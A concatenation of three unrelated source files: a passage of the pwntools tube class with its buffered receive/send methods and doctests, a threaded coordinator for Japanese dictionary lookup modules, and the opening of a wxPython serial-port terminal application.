Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
.. doctest::
>>> t = tube()
>>> data = 'hello world'
>>> t.recv_raw = lambda *a: data
>>> t.recvn(len(data)) == data
True
>>> t.recvn(len(data)+1) == data + data[0]
True
>>> t.recv_raw = lambda *a: None
>>> # The remaining data is buffered
>>> t.recv() == data[1:]
True
>>> t.recv_raw = lambda *a: time.sleep(0.01) or 'a'
>>> t.recvn(10, timeout=0.05)
''
>>> t.recvn(10, timeout=0.05)
'aaaaaaaaaa'
"""
# Keep track of how much data has been received
# It will be pasted together at the end if a
# timeout does not occur, or put into the tube buffer.
with self.countdown(timeout):
while self.countdown_active() and len(self.buffer) < numb and self._fillbuffer(self.timeout):
pass
if len(self.buffer) < numb:
return ''
return self.buffer.get(numb)
def recvuntil(self, delims, drop=False, timeout = default):
"""recvuntil(delims, timeout = default) -> str
Recieve data until one of `delims` is encountered.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
arguments:
delims(str,tuple): String of delimiters characters, or list of delimiter strings.
drop(bool): Drop the ending. If ``True`` it is removed from the end of the return value.
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello World!"
>>> t.recvuntil(' ')
'Hello '
>>> _=t.clean(0)
>>> # Matches on 'o' in 'Hello'
>>> t.recvuntil(tuple(' Wor'))
'Hello'
>>> _=t.clean(0)
>>> # Matches expressly full string
>>> t.recvuntil(' Wor')
'Hello Wor'
>>> _=t.clean(0)
>>> # Matches on full string, drops match
>>> t.recvuntil(' Wor', drop=True)
'Hello'
>>> # Try with regex special characters
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello|World"
>>> t.recvuntil('|', drop=True)
'Hello'
"""
# Convert string into singleton tupple
if isinstance(delims, (str, unicode)):
delims = (delims,)
# Longest delimiter for tracking purposes
longest = max(map(len, delims))
# Cumulative data to search
data = []
top = ''
with self.countdown(timeout):
while self.countdown_active():
try:
res = self.recv(timeout=self.timeout)
except:
self.unrecv(''.join(data) + top)
raise
if not res:
self.unrecv(''.join(data) + top)
return ''
top += res
start = len(top)
for d in delims:
j = top.find(d)
if start > j > -1:
start = j
end = j + len(d)
if start < len(top):
self.unrecv(top[end:])
if drop:
top = top[:start]
else:
top = top[:end]
return ''.join(data) + top
if len(top) > longest:
i = -longest - 1
data.append(top[:i])
top = top[i:]
return ''
def recvlines(self, numlines, keepends = False, timeout = default):
r"""recvlines(numlines, keepends = False, timeout = default) -> str list
Recieve up to ``numlines`` lines.
A "line" is any sequence of bytes terminated by the byte sequence
set by :attr:`newline`, which defaults to ``'\n'``.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
numlines(int): Maximum number of lines to receive
keepends(bool): Keep newlines at the end of each line (``False``).
timeout(int): Maximum timeout
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: '\n'
>>> t.recvlines(3)
['', '', '']
>>> t.recv_raw = lambda n: 'Foo\nBar\nBaz\n'
>>> t.recvlines(3)
['Foo', 'Bar', 'Baz']
>>> t.recvlines(3, True)
['Foo\n', 'Bar\n', 'Baz\n']
"""
lines = []
with self.countdown(timeout):
for _ in xrange(numlines):
try:
# We must set 'keepends' to True here so that we can
# restore the original, unmodified data to the buffer
# in the event of a timeout.
res = self.recvline(keepends=True, timeout=timeout)
except:
self.unrecv(''.join(lines))
raise
if res:
lines.append(res)
else:
break
if not keepends:
lines = [line.rstrip(self.newline) for line in lines]
return lines
def recvline(self, keepends = True, timeout = default):
r"""recvline(keepends = True) -> str
Receive a single line from the tube.
A "line" is any sequence of bytes terminated by the byte sequence
set in :attr:`newline`, which defaults to ``'\n'``.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
keepends(bool): Keep the line ending (``True``).
timeout(int): Timeout
Return:
All bytes received over the tube until the first
newline ``'\n'`` is received. Optionally retains
the ending.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: 'Foo\nBar\r\nBaz\n'
>>> t.recvline()
'Foo\n'
>>> t.recvline()
'Bar\r\n'
>>> t.recvline(keepends = False)
'Baz'
>>> t.newline = '\r\n'
>>> t.recvline(keepends = False)
'Foo\nBar'
"""
return self.recvuntil(self.newline, drop = not keepends, timeout = timeout)
def recvline_pred(self, pred, keepends = False, timeout = default):
r"""recvline_pred(pred, keepends = False) -> str
Receive data until ``pred(line)`` returns a truthy value.
Drop all other data.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
pred(callable): Function to call. Returns the line for which
this function returns ``True``.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: "Foo\nBar\nBaz\n"
>>> t.recvline_pred(lambda line: line == "Bar\n")
'Bar'
>>> t.recvline_pred(lambda line: line == "Bar\n", keepends=True)
'Bar\n'
>>> t.recvline_pred(lambda line: line == 'Nope!', timeout=0.1)
''
"""
tmpbuf = Buffer()
line = ''
with self.countdown(timeout):
while self.countdown_active():
try:
line = self.recvline(keepends=True)
except:
self.buffer.add(tmpbuf)
raise
if not line:
self.buffer.add(tmpbuf)
return ''
if pred(line):
if not keepends:
line = line[:-len(self.newline)]
return line
else:
tmpbuf.add(line)
return ''
def recvline_contains(self, items, keepends = False, timeout = default):
r"""
Receive lines until one line is found which contains at least
one of `items`.
Arguments:
items(str,tuple): List of strings to search for, or a single string.
keepends(bool): Return lines with newlines if ``True``
timeout(int): Timeout, in seconds
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello\nWorld\nXylophone\n"
>>> t.recvline_contains('r')
'World'
>>> f = lambda n: "cat dog bird\napple pear orange\nbicycle car train\n"
>>> t = tube()
>>> t.recv_raw = f
>>> t.recvline_contains('pear')
'apple pear orange'
>>> t = tube()
>>> t.recv_raw = f
>>> t.recvline_contains(('car', 'train'))
'bicycle car train'
"""
if isinstance(items, (str,unicode)):
items = (items,)
def pred(line):
return any(d in line for d in items)
return self.recvline_pred(pred, keepends, timeout)
def recvline_startswith(self, delims, keepends = False, timeout = default):
r"""recvline_startswith(delims, keepends = False, timeout = default) -> str
Keep recieving lines until one is found that starts with one of
`delims`. Returns the last line recieved.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
delims(str,tuple): List of strings to search for, or string of single characters
keepends(bool): Return lines with newlines if ``True``
timeout(int): Timeout, in seconds
Returns:
The first line received which starts with a delimiter in ``delims``.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello\nWorld\nXylophone\n"
>>> t.recvline_startswith(tuple('WXYZ'))
'World'
>>> t.recvline_startswith(tuple('WXYZ'), True)
'Xylophone\n'
>>> t.recvline_startswith('Wo')
'World'
"""
# Convert string into singleton tupple
if isinstance(delims, (str, unicode)):
delims = (delims,)
return self.recvline_pred(lambda line: any(map(line.startswith, delims)),
keepends=keepends,
timeout=timeout)
def recvline_endswith(self, delims, keepends = False, timeout = default):
r"""recvline_endswith(delims, keepends = False, timeout = default) -> str
Keep recieving lines until one is found that starts with one of
`delims`. Returns the last line recieved.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
See :meth:`recvline_startswith` for more details.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: 'Foo\nBar\nBaz\nKaboodle\n'
>>> t.recvline_endswith('r')
'Bar'
>>> t.recvline_endswith(tuple('abcde'), True)
'Kaboodle\n'
>>> t.recvline_endswith('oodle')
'Kaboodle'
"""
# Convert string into singleton tupple
if isinstance(delims, (str, unicode)):
delims = (delims,)
delims = tuple(delim + self.newline for delim in delims)
return self.recvline_pred(lambda line: any(map(line.endswith, delims)),
keepends=keepends,
timeout=timeout)
def recvregex(self, regex, exact = False, timeout = default):
"""recvregex(regex, exact = False, timeout = default) -> str
Wrapper around :func:`recvpred`, which will return when a regex
matches the string in the buffer.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
"""
if isinstance(regex, (str, unicode)):
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvpred(pred, timeout = timeout)
def recvline_regex(self, regex, exact = False, keepends = False, timeout = default):
"""recvregex(regex, exact = False, keepends = False, timeout = default) -> str
Wrapper around :func:`recvline_pred`, which will return when a regex
matches a line.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
"""
if isinstance(regex, (str, unicode)):
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvline_pred(pred, keepends = keepends, timeout = timeout)
def recvrepeat(self, timeout = default):
"""recvrepeat()
Receives data until a timeout or EOF is reached.
Examples:
>>> data = [
... 'd',
... '', # simulate timeout
... 'c',
... 'b',
... 'a',
... ]
>>> def delayrecv(n, data=data):
... return data.pop()
>>> t = tube()
>>> t.recv_raw = delayrecv
>>> t.recvrepeat(0.2)
'abc'
>>> t.recv()
'd'
"""
try:
while self._fillbuffer(timeout=timeout):
pass
except EOFError:
pass
return self.buffer.get()
def recvall(self, timeout=Timeout.forever):
"""recvall() -> str
Receives data until EOF is reached.
"""
with log.waitfor('Recieving all data') as h:
l = len(self.buffer)
with self.local(timeout):
try:
while True:
l = misc.size(len(self.buffer))
h.status(l)
if not self._fillbuffer():
break
except EOFError:
pass
h.success("Done (%s)" % l)
self.close()
return self.buffer.get()
def send(self, data):
"""send(data)
Sends data.
If log level ``DEBUG`` is enabled, also prints out the data
received.
If it is not possible to send anymore because of a closed
connection, it raises ``exceptions.EOFError``
Examples:
>>> def p(x): print repr(x)
>>> t = tube()
>>> t.send_raw = p
>>> t.send('hello')
'hello'
"""
if dumplog.isEnabledFor(logging.DEBUG):
log.debug('Sent %#x bytes:' % len(data))
if all(c in string.printable for c in data):
for line in data.splitlines(True):
log.indented(repr(line), level = logging.DEBUG)
else:
log.indented(fiddling.hexdump(data), level = logging.DEBUG)
self.send_raw(data)
def sendline(self, line):
r"""sendline(data)
Shorthand for ``t.send(data + t.newline)``.
Examples:
>>> def p(x): print repr(x)
>>> t = tube()
>>> t.send_raw = p
>>> t.sendline('hello')
'hello\n'
>>> t.newline = '\r\n'
>>> t.sendline('hello')
'hello\r\n'
"""
self.send(line + self.newline)
def sendafter(self, delim, data, timeout = default):
"""sendafter(delim, data, timeout = default) -> str
A combination of ``recvuntil(delim, timeout)`` and ``send(data)``.
"""
res = self.recvuntil(delim, timeout)
self.send(data)
return res
def sendlineafter(self, delim, data, timeout = default):
"""sendlineafter(delim, data, timeout = default) -> str
A combination of ``recvuntil(delim, timeout)`` and ``sendline(data)``."""
res = self.recvuntil(delim, timeout)
self.sendline(data)
return res
def sendthen(self, delim, data, timeout = default):
"""sendthen(delim, data, timeout = default) -> str
A combination of ``send(data)`` and ``recvuntil(delim, timeout)``."""
self.send(data)
return self.recvuntil(delim, timeout)
def sendlinethen(self, delim, data, timeout = default):
"""sendlinethen(delim, data, timeout = default) -> str
A combination of ``sendline(data)`` and ``recvuntil(delim, timeout)``."""
self.send(data + self.newline)
return self.recvuntil(delim, timeout)
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
Does simultaneous reading and writing to the tube. In principle this just
connects the tube to standard in and standard out, but in practice this
is much more usable, since we are using :mod:`pwnlib.term` to print a
floating prompt.
Thus it only works in while in :data:`pwnlib.term.term_mode`.
"""
log.info('Switching to interactive mode')
go = threading.Event()
def recv_thread():
while not go.isSet():
try:
cur = self.recv(timeout = 0.05)
if cur:
sys.stderr.write(cur)
sys.stderr.flush()
except EOFError:
log.info('Got EOF while reading in interactive')
break
t = context.Thread(target = recv_thread)
t.daemon = True
t.start()
try:
while not go.isSet():
if term.term_mode:
data = term.readline.readline(prompt = prompt, float = True)
else:
data = sys.stdin.read(1)
if data:
try:
self.send(data)
except EOFError:
go.set()
log.info('Got EOF while sending in interactive')
else:
go.set()
except KeyboardInterrupt:
log.info('Interrupted')
go.set()
while t.is_alive():
t.join(timeout = 0.1)
def clean(self, timeout = 0.05):
"""clean(timeout = 0.05)
Removes all the buffered data from a tube by calling
:meth:`pwnlib.tubes.tube.tube.recv` with a low timeout until it fails.
If ``timeout`` is zero, only cached data will be cleared.
Note: If timeout is set to zero, the underlying network is
not actually polled; only the internal buffer is cleared.
Returns:
All data received
Examples:
>>> t = tube()
>>> t.unrecv('clean me up')
>>> t.clean(0)
'clean me up'
>>> len(t.buffer)
0
"""
if timeout == 0:
return self.buffer.get()
return self.recvrepeat(timeout)
def clean_and_log(self, timeout = 0.05):
r"""clean_and_log(timeout = 0.05)
Works exactly as :meth:`pwnlib.tubes.tube.tube.clean`, but logs recieved
data with :meth:`pwnlib.log.info`.
Returns:
All data received
Examples:
>>> def recv(n, data=['', 'hooray_data']):
... while data: return data.pop()
>>> t = tube()
>>> t.recv_raw = recv
>>> t.connected_raw = lambda d: True
>>> t.fileno = lambda: 1234
>>> with context.local(log_level='info'):
... data = t.clean_and_log() #doctest: +ELLIPSIS
'hooray_data'
>>> data
'hooray_data'
>>> context.clear()
"""
data = self.clean(timeout)
if all(c in string.printable for c in data):
for line in data.splitlines(True):
log.indented(repr(line))
else:
log.indented(fiddling.hexdump(data))
return data
def connect_input(self, other):
"""connect_input(other)
Connects the input of this tube to the output of another tube object.
Examples:
>>> def p(x): print x
>>> def recvone(n, data=['data']):
... while data: return data.pop()
... raise EOFError
>>> a = tube()
>>> b = tube()
>>> a.recv_raw = recvone
>>> b.send_raw = p
>>> a.connected_raw = lambda d: True
>>> b.connected_raw = lambda d: True
>>> a.shutdown = lambda d: True
>>> b.shutdown = lambda d: True
>>> import time
>>> _=(b.connect_input(a), time.sleep(0.1))
data
"""
def pump():
import sys as _sys
while self.countdown_active():
if not (self.connected('send') and other.connected('recv')):
break
try:
data = other.recv(timeout = 0.05)
except EOFError:
break
if not _sys:
return
if not data:
continue
try:
self.send(data)
except EOFError:
break
if not _sys:
return
self.shutdown('send')
other.shutdown('recv')
t = context.Thread(target = pump)
t.daemon = True
t.start()
def connect_output(self, other):
"""connect_output(other)
Connects the output of this tube to the input of another tube object.
Examples:
>>> def p(x): print x
>>> def recvone(n, data=['data']):
... while data: return data.pop()
... raise EOFError
>>> a = tube()
>>> b = tube()
>>> a.recv_raw = recvone
>>> b.send_raw = p
>>> a.connected_raw = lambda d: True
>>> b.connected_raw = lambda d: True
>>> a.shutdown = lambda d: True
>>> b.shutdown = lambda d: True
>>> _=(a.connect_output(b), time.sleep(0.1))
data
"""
other.connect_input(self)
def connect_both(self, other):
"""connect_both(other)
Connects the both ends of this tube object with another tube object."""
self.connect_input(other)
self.connect_output(other)
def spawn_process(self, *args, **kwargs):
"""Spawns a new process having this tube as stdin, stdout and stderr.
Takes the same arguments as :class:`subprocess.Popen`."""
return subprocess.Popen(
*args,
stdin = self.fileno(),
stdout = self.fileno(),
stderr = self.fileno(),
**kwargs
)
def __lshift__(self, other):
"""
Shorthand for connecting multiple tubes.
See :meth:`connect_input` for more information.
Examples:
The following are equivalent ::
tube_a >> tube.b
tube_a.connect_input(tube_b)
This is useful when chaining multiple tubes ::
tube_a >> tube_b >> tube_a
tube_a.connect_input(tube_b)
tube_b.connect_input(tube_a)
"""
self.connect_input(other)
return other
def __rshift__(self, other):
"""
Inverse of the ``<<`` operator. See :meth:`__lshift__`.
See :meth:`connect_input` for more information.
"""
self.connect_output(other)
return other
def __ne__(self, other):
"""
Shorthand for connecting tubes to eachother.
The following are equivalent ::
a >> b >> a
a <> b
See :meth:`connect_input` for more information.
"""
self << other << self
def wait_for_close(self):
"""Waits until the tube is closed."""
while self.connected():
time.sleep(0.05)
def can_recv(self, timeout = 0):
"""can_recv(timeout = 0) -> bool
Returns True, if there is data available within `timeout` seconds.
Examples:
>>> import time
>>> t = tube()
>>> t.can_recv_raw = lambda *a: False
>>> t.can_recv()
False
>>> _=t.unrecv('data')
>>> t.can_recv()
True
>>> _=t.recv()
>>> t.can_recv()
False
"""
return bool(self.buffer or self.can_recv_raw(timeout))
def settimeout(self, timeout):
"""settimeout(timeout)
Set the timeout for receiving operations. If the string "default"
is given, then :data:`context.timeout` will be used. If None is given,
then there will be no timeout.
Examples:
>>> t = tube()
>>> t.settimeout_raw = lambda t: None
>>> t.settimeout(3)
>>> t.timeout == 3
True
"""
self.timeout = timeout
shutdown_directions = {
'in': 'recv',
'read': 'recv',
'recv': 'recv',
'out': 'send',
'write': 'send',
'send': 'send',
}
connected_directions = shutdown_directions.copy()
connected_directions['any'] = 'any'
def shutdown(self, direction = "send"):
"""shutdown(direction = "send")
Closes the tube for futher reading or writing depending on `direction`.
Arguments:
direction(str): Which direction to close; "in", "read" or "recv"
closes the tube in the ingoing direction, "out", "write" or "send"
closes it in the outgoing direction.
Returns:
:const:`None`
Examples:
>>> def p(x): print x
>>> t = tube()
>>> t.shutdown_raw = p
>>> _=map(t.shutdown, ('in', 'read', 'recv', 'out', 'write', 'send'))
recv
recv
recv
send
send
send
>>> t.shutdown('bad_value') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: "direction must be in ['in', 'out', 'read', 'recv', 'send', 'write']"
"""
try:
direction = self.shutdown_directions[direction]
except KeyError:
raise KeyError('direction must be in %r' % sorted(self.shutdown_directions))
else:
self.shutdown_raw(self.shutdown_directions[direction])
def connected(self, direction = 'any'):
"""connected(direction = 'any') -> bool
Returns True if the tube is connected in the specified direction.
Arguments:
direction(str): Can be the string 'any', 'in', 'read', 'recv',
'out', 'write', 'send'.
Doctest:
>>> def p(x): print x
>>> t = tube()
>>> t.connected_raw = p
>>> _=map(t.connected, ('any', 'in', 'read', 'recv', 'out', 'write', 'send'))
any
recv
recv
recv
send
send
send
>>> t.connected('bad_value') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: "direction must be in ['any', 'in', 'out', 'read', 'recv', 'send', 'write']"
"""
try:
direction = self.connected_directions[direction]
except KeyError:
raise KeyError('direction must be in %r' % sorted(self.connected_directions))
else:
return self.connected_raw(direction)
def __enter__(self):
"""Permit use of 'with' to control scoping and closing sessions.
Examples:
.. doctest::
>>> t = tube()
>>> def p(x): print x
>>> t.close = lambda: p("Closed!")
>>> with t: pass
Closed!
"""
return self
def __exit__(self, type, value, traceback):
"""Handles closing for 'with' statement
See :meth:`__enter__`
"""
self.close()
# The minimal interface to be implemented by a child
def recv_raw(self, numb):
"""recv_raw(numb) -> str
Should not be called directly. Receives data without using the buffer
on the object.
Unless there is a timeout or closed connection, this should always
return data. In case of a timeout, it should return None, in case
of a closed connection it should raise an ``exceptions.EOFError``.
"""
raise EOFError('Not implemented')
def send_raw(self, data):
"""send_raw(data)
Should not be called directly. Sends data to the tube.
Should return ``exceptions.EOFError``, if it is unable to send any
more, because of a close tube.
"""
raise EOFError('Not implemented')
def settimeout_raw(self, timeout):
"""settimeout_raw(timeout)
Should not be called directly. Sets the timeout for
the tube.
"""
raise NotImplementedError()
def timeout_change(self):
"""
Informs the raw layer of the tube that the timeout has changed.
Should not be called directly.
Inherited from :class:`Timeout`.
"""
try:
self.settimeout_raw(self.timeout)
except NotImplementedError:
pass
def can_recv_raw(self, timeout):
"""can_recv_raw(timeout) -> bool
Should not be called directly. Returns True, if
there is data available within the timeout, but
ignores the buffer on the object.
"""
raise NotImplementedError()
def connected_raw(self, direction):
"""connected(direction = 'any') -> bool
Should not be called directly. Returns True iff the
tube is connected in the given direction.
"""
raise NotImplementedError()
def close(self):
"""close()
Closes the tube.
"""
pass
# Ideally we could:
# raise NotImplementedError()
# But this causes issues with the unit tests.
def fileno(self):
"""fileno() -> int
Returns the file number used for reading.
"""
raise NotImplementedError()
def shutdown_raw(self, direction):
"""shutdown_raw(direction)
Should not be called directly. Closes the tube for further reading or
writing.
"""
raise NotImplementedError()
#: Alias for :meth:`recv`
def read(self, *a, **kw): return self.recv(*a, **kw)
#: Alias for :meth:`recvpred`
def readpred(self, *a, **kw): return self.recvpred(*a, **kw)
#: Alias for :meth:`recvn`
def readn(self, *a, **kw): return self.recvn(*a, **kw)
#: Alias for :meth:`recvuntil`
def readuntil(self, *a, **kw): return self.recvuntil(*a, **kw)
#: Alias for :meth:`recvlines`
def readlines(self, *a, **kw): return self.recvlines(*a, **kw)
#: Alias for :meth:`recvline`
def readline(self, *a, **kw): return self.recvline(*a, **kw)
#: Alias for :meth:`recvline_pred`
def readline_pred(self, *a, **kw): return self.recvline_pred(*a, **kw)
#: Alias for :meth:`recvline_contains`
def readline_contains(self, *a, **kw): return self.recvline_contains(*a, **kw)
#: Alias for :meth:`recvline_startswith`
def readline_startswith(self, *a, **kw): return self.recvline_startswith(*a, **kw)
#: Alias for :meth:`recvline_endswith`
def readline_endswith(self, *a, **kw): return self.recvline_endswith(*a, **kw)
#: Alias for :meth:`recvregex`
def readregex(self, *a, **kw): return self.recvregex(*a, **kw)
#: Alias for :meth:`recvline_regex`
def readline_regex(self, *a, **kw): return self.recvline_regex(*a, **kw)
#: Alias for :meth:`recvrepeat`
def readrepeat(self, *a, **kw): return self.recvrepeat(*a, **kw)
#: Alias for :meth:`recvall`
def readall(self, *a, **kw): return self.recvall(*a, **kw)
#: Alias for :meth:`send`
def write(self, *a, **kw): return self.send(*a, **kw)
#: Alias for :meth:`sendline`
def writeline(self, *a, **kw): return self.sendline(*a, **kw)
#: Alias for :meth:`sendafter`
def writeafter(self, *a, **kw): return self.sendafter(*a, **kw)
#: Alias for :meth:`sendlineafter`
def writelineafter(self, *a, **kw): return self.sendlineafter(*a, **kw)
#: Alias for :meth:`sendthen`
def writethen(self, *a, **kw): return self.sendthen(*a, **kw)
#: Alias for :meth:`sendlinethen`
def writelinethen(self, *a, **kw): return self.sendlinethen(*a, **kw)
|
coordinator.py
|
from collections import defaultdict
from threading import Thread
from typing import Any, DefaultDict, Protocol
from custom_types.alternative_string_types import Kaki
from custom_types.response_types import FullResponseItem
from modules import forvo, jisho, ojad, suzuki, tangorin, wadoku, wanikani
class Module(Protocol): # pylint: disable=too-few-public-methods
NAME: str
def main(self, word_list: list[Kaki]) -> dict: ...
MODULES = (
forvo,
jisho,
ojad,
suzuki,
tangorin,
wadoku,
wanikani,
)
def get_info(word_list: list[Kaki]) -> list[FullResponseItem]:
results_dict = generate_results_dict(word_list)
response = generate_response(results_dict, word_list)
return response
def generate_results_dict(word_list: list[Kaki]) -> DefaultDict[str,dict[Kaki, Any]]:
results_dict: DefaultDict[str,dict[Kaki, Any]] = defaultdict(dict)
def call_script(module: Module, word_list: list[Kaki]) -> None:
results_dict[module.NAME] = module.main(word_list)
threads: list[Thread] = [
Thread(target=call_script, args=[module, word_list])
for module in MODULES
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return results_dict
def generate_response(
results_dict: DefaultDict[str,dict[Kaki, Any]],
word_list: list[Kaki],
) -> list[FullResponseItem]:
resp: list[FullResponseItem] = [
{'word' : word} | # type: ignore
{module.NAME : results_dict[module.NAME][word] for module in MODULES} # type: ignore
for word in word_list
]
return resp
|
main.py
|
# -*- coding:utf-8 -*-
import sys, os
import wx
import fcvsGUI as ui
import threading
import re
import serial
import time
from wx.lib.wordwrap import wordwrap
import _winreg as winreg
import itertools
import icon32
import pkg_resources
import zipfile
from cStringIO import StringIO
import webbrowser
import glob
MAINMENU = 0
SUBMENU = 1
MENUITEM = 2
CHECKITEM = 3
SEPARATOR = 4
RADIOITEM = 5
ASCII = 0
HEX = 1
THREAD_TIMEOUT = 0.5
AppTitle = 'MyTerm for FCVS'
AppVersion = '1.0'
SERIALRX = wx.NewEventType() # Create an own event type
EVT_SERIALRX = wx.PyEventBinder(SERIALRX, 0) # bind to serial data receive events
class SerialRxEvent(wx.PyCommandEvent):
eventType = SERIALRX
def __init__(self, windowID, data):
wx.PyCommandEvent.__init__(self, self.eventType, windowID)
self.data = data
def Clone(self):
self.__class__(self.GetId(), self.data)
SERIALEXCEPT = wx.NewEventType()
EVT_SERIALEXCEPT = wx.PyEventBinder(SERIALEXCEPT, 0)
class SerialExceptEvent(wx.PyCommandEvent):
eventType = SERIALEXCEPT
def __init__(self, windowID, param):
wx.PyCommandEvent.__init__(self, self.eventType ,windowID)
self.param = param
def Clone(self):
self.__class__(self.GetId(), self.param)
regex_matchTTY = re.compile('/tty/(?P<tty>\w+)')
def EnumerateSerialPorts():
if sys.platform == 'win32':
""" Uses the Win32 registry to return an
iterator of serial (COM) ports
existing on this computer.
"""
pathDevi = r'HARDWARE\DEVICEMAP'
try:
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, pathDevi)
except WindowsError:
# failed in reading registry.
# return COM1 ~ COM16
for i in range(1, 17):
yield "COM" + str(i)
return
pathCOMM = r'HARDWARE\DEVICEMAP\SERIALCOMM'
try:
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, pathCOMM)
except WindowsError:
# when getting none serial port,
# SERIALCOMM is not exist in "HARDWARE\DEVICEMAP\".
# return nothing.
return
for i in itertools.count():
try:
val = winreg.EnumValue(key, i)
yield str(val[1])
except EnvironmentError:
break
elif sys.platform.startswith('linux'):
for t in glob.glob('/sys/class/tty/*/device/driver'):
r = regex_matchTTY.search(t)
if r:
yield '/dev/%s' % r.group('tty')
MenuDefs = (
MAINMENU,
('&File', (
(MENUITEM, wx.NewId(), '&Save', 'Save to a file' , 'self.OnSave' ),
(SEPARATOR,),
(MENUITEM, wx.NewId(), '&Exit MyTerm', 'Exit MyTerm', 'self.OnExitApp' ),
)),
('&Port', (
(MENUITEM, wx.NewId(), '&Open', 'Open the Port' , 'self.OnOpenPort' ),
(MENUITEM, wx.NewId(), '&Close', 'Close the Port', 'self.OnClosePort' ),
)),
('&Display', (
(MENUITEM, wx.NewId(), '&Show Setting Bar', 'Show Setting Bar', 'self.OnShowSettingBar' ),
(CHECKITEM, wx.NewId(), '&Always on top', 'always on most top', 'self.OnAlwayOnTop' ),
(CHECKITEM, wx.NewId(), '&Local echo', 'echo what you typed', 'self.OnLocalEcho' ),
(SUBMENU, '&Rx view as', (
(RADIOITEM, wx.NewId(), '&Ascii', '', 'self.OnRxAsciiMode' ),
(RADIOITEM, wx.NewId(), '&Hex', '', 'self.OnRxHexMode' ),
)),
# (SUBMENU, 'Tx view as', (
# (RADIOITEM, wx.NewId(), 'ASCII', '', 'self.OnTxAsciiMode' ),
# (RADIOITEM, wx.NewId(), 'HEX', '', 'self.OnTxHexMode' ),
# )),
# (CHECKITEM, wx.NewId(), 'S&tatus Bar', 'Show Status Bar', 'self.OnShowStatusBar' ),
)),
('&Help', (
(MENUITEM, wx.NewId(), '&About', 'About MyTerm', 'self.OnAbout' ),
))
)
regex_matchPort = re.compile('COM(?P<port>\d+)')
regex_matchCmdList = re.compile(
'\|\s+(?P<index>\d)\s+\|\s+(?P<time>\d+|-)\s+\|\s+(?P<count>\d+|-)\s+\|\s+(?P<setvolt>\d+|-)\s+\|\s+(?P<realvolt>[0-9.]+|-)\s+\|')
serialport = serial.Serial()
class MyApp(wx.App):
def OnInit(self):
self.frame = ui.MyFrame(None, wx.ID_ANY, "")
my_data = pkg_resources.resource_string(__name__,"library.zip")
filezip = StringIO(my_data)
zf = zipfile.ZipFile(filezip)
data = zf.read("media/icon16.ico")
# self.frame.SetIcon(icon16.geticon16Icon())
icon = wx.EmptyIcon()
icon.CopyFromBitmap(wx.ImageFromStream(StringIO(data), wx.BITMAP_TYPE_ICO).ConvertToBitmap())
self.frame.SetIcon(icon)
# self.frame.SetIcon(wx.Icon("media\icon16.ico", wx.BITMAP_TYPE_ICO, 16, 16))
self.frame.SplitterWindow.SetSashSize(0)
self.frame.SplitterWindow.SetSashPosition(160, True)
# self.frame.choicePort.AppendItems(('COM1', 'COM2', 'COM3', 'COM4', 'COM5', 'COM6', 'COM7', 'COM8'))
self.OnEnumPorts()
self.frame.choicePort.Select(0)
self.frame.cmbBaudRate.Select(6)
# initial variables
self.rxmode = ASCII
self.txmode = ASCII
self.localEcho = False
self.rxCount = 0
self.txCount = 0
# Make a menu
menuBar = wx.MenuBar()
self.MakeMenu(menuBar, MenuDefs)
self.frame.SetMenuBar(menuBar)
# bind events
self.frame.btnHideBar.Bind(wx.EVT_BUTTON, self.OnHideSettingBar)
self.frame.btnOpen.Bind(wx.EVT_BUTTON, self.OnBtnOpen)
self.frame.btnEnumPorts.Bind(wx.EVT_BUTTON, self.OnEnumPorts)
self.frame.btnClear.Bind(wx.EVT_BUTTON, self.OnClear)
# self.frame.Bind(wx.EVT_WINDOW_DESTROY, self.Cleanup)
self.frame.Bind(wx.EVT_CLOSE, self.Cleanup)
self.Bind(EVT_SERIALEXCEPT, self.OnSerialExcept)
self.Bind(EVT_SERIALRX, self.OnSerialRx)
self.frame.txtctlMain.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)
self.frame.txtctlMain.Bind(wx.EVT_CHAR, self.OnSerialWrite)
self.frame.txtctlMain.Bind(wx.EVT_TEXT_PASTE, self.OnPaste)
self.frame.txtctlMain.Bind(wx.EVT_TEXT_URL, self.OnURL)
self.frame.btnGetInfo.Bind(wx.EVT_BUTTON, self.OnBtnGetInfo)
